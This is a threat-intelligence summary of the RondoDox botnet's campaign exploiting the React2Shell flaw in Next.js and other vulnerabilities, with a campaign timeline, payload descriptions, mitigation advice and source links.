Key Findings

• The RondoDox botnet has been conducting a persistent nine-month campaign targeting IoT devices and web applications.

• The botnet has been exploiting the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability in Next.js and React Server Components (RSC) to achieve remote code execution on susceptible devices.

• There are about 90,300 instances that remain vulnerable to React2Shell globally, with the majority (68,400) located in the U.S.

• The RondoDox botnet has expanded its arsenal by adding new n-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893.

• The botnet has been observed deploying cryptocurrency miners, a botnet loader and health checker, and a Mirai botnet variant on infected devices.

Background

The RondoDox botnet, which emerged in early 2025, has been conducting a multi-stage campaign to compromise IoT devices and web applications. The threat actors behind the botnet have been leveraging a variety of security vulnerabilities to expand their reach, including the recently disclosed React2Shell flaw.

React2Shell is a critical vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to the Shadowserver Foundation, there are approximately 90,300 instances that remain vulnerable to the flaw as of December 2025, with the majority (68,400) located in the U.S.

Initial Reconnaissance and Vulnerability Scanning

The RondoDox botnet campaign is assessed to have gone through three distinct phases prior to the exploitation of CVE-2025-55182:

1. March - April 2025: Initial reconnaissance and manual vulnerability scanning

2. April - June 2025: Daily mass vulnerability probing of web applications like WordPress, Drupal, and Struts2, and IoT devices like Wavlink routers

3. July - early December 2025: Hourly automated deployment on a large-scale

Exploitation of React2Shell Vulnerability

In the attacks detected in December 2025, the threat actors are said to have initiated scans to identify vulnerable Next.js servers, followed by attempts to drop cryptocurrency miners ("/nuts/poop"), a botnet loader and health checker ("/nuts/bolts"), and a Mirai botnet variant ("/nuts/x86") on infected devices.

The "/nuts/bolts" component is designed to terminate competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server. One variant of the tool has been found to remove known botnets, Docker-based payloads, artifacts left from prior campaigns, and associated cron jobs, while also setting up persistence using "/etc/crontab."

Mitigation Recommendations

To mitigate the risk posed by the RondoDox botnet, organizations are advised to:

• Update Next.js to a patched version as soon as possible

• Segment all IoT devices into dedicated VLANs

• Deploy Web Application Firewalls (WAFs)

• Monitor for suspicious process execution

• Block known C2 infrastructure

Sources

• https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html

• https://app.daily.dev/posts/rondodox-botnet-exploits-critical-react2shell-flaw-to-hijack-iot-devices-and-web-servers-fu77llwtm

• https://www.cypro.se/2026/01/01/rondodox-botnet-exploits-critical-react2shell-flaw-to-hijack-iot-devices-and-web-servers/

• https://x.com/TheCyberSecHub/status/2006667499086164080

• https://securityaffairs.com/186386/uncategorized/react2shell-under-attack-rondodox-botnet-spreads-miners-and-malware.html